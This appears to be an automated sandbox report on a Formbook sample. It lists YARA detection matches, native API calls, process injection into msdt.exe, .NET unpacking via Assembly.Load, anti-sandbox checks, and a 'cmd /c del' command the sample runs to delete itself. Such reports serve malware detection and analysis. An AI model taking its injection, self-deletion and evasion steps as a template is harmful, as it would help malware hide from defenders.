      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002769C9
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00276D30
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002790C0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002790D0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_0027A44B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA67E7
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA0048
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA5C18
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA0012
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00F57447
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_002700F0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00401030
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041BA85
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C296
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041BBE0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00408C6B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00408C70
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C40C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C4F7
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041C55C
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00402D90
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00402FB0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089E0C6
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008CD005
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A3040
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008B905A
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089E2E9
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00941238
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089F3CF
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008C63DB
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A2305
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A7353
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008EA37B
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008B1489
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008D5485
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008BC5F0
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A351F
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A4680
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008AE6C1
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00942622
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00F57447
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02641238
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259E2E9
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A7353
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025EA37B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A2305
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C63DB
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259F3CF
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B905A
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A3040
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025CD005
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259E0C6
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02642622
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AE6C1
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A4680
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D57C3
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AC7BC
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0262579A
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B1489
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D5485
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A351F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025BC5F0
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02653A83
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C7B00
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259FBD7
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0262DBDA
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0264CBA4
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025AC85C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025C286D
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0263F8EE
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02625955
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B69FE
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A29B2
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0264098E
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025BEE4C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D2E2F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025CDF7C
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025B0F3F
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025ACD5B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025D0D3B
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0263FDDD
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025E373B appears 238 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0260F970 appears 81 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0259DF5C appears 107 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0259E2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025E3F92 appears 108 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 0089DF5C appears 50 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 008E3F92 appears 43 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: String function: 008E373B appears 81 times
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004185D0 NtCreateFile,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00418680 NtReadFile,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00418700 NtClose,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004187B0 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004186FA NtClose,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004187AA NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008910D0 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00890060 NtQuerySection,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008901D4 NtSetValueKey,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0089010C NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00891148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590078 NtResumeThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590060 NtQuerySection,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025910D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025901D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258F938 NtWriteFile,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02590C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0258FD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_02591D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_001185D0 NtCreateFile,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_00118680 NtReadFile,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_00118700 NtClose,
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_001187B0 NtAllocateVirtualMemory,
      Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
      Source: ejecutable1.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and write
      Source: ejecutable1.exeVirustotal: Detection: 36%
      Source: ejecutable1.exeReversingLabs: Detection: 13%
      Source: ejecutable1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ejecutable1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exeFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@11/8
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: ejecutable1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: ejecutable1.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Data Obfuscation:

      barindex
      .NET source code contains potential unpackerShow sources
      Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_0027EC70 push eax; retn 0027h
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 0_2_00DA44FA push ds; iretd
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B87C push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B812 push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B81B push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415B53 push ds; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415B1A push ds; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415CE2 push 81CAEFA2h; retf
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00415F6D push ss; ret
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_0041B7C5 push eax; ret
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_0259DFA1 push ecx; ret
      Source: initial sampleStatic PE information: section name: .text entropy: 6.99789102279

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Self deletion via cmd deleteShow sources
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Deletes itself after installationShow sources
      Source: C:\Windows\SysWOW64\cmd.exeFile deleted: c:\users\user\desktop\ejecutable1.exeJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
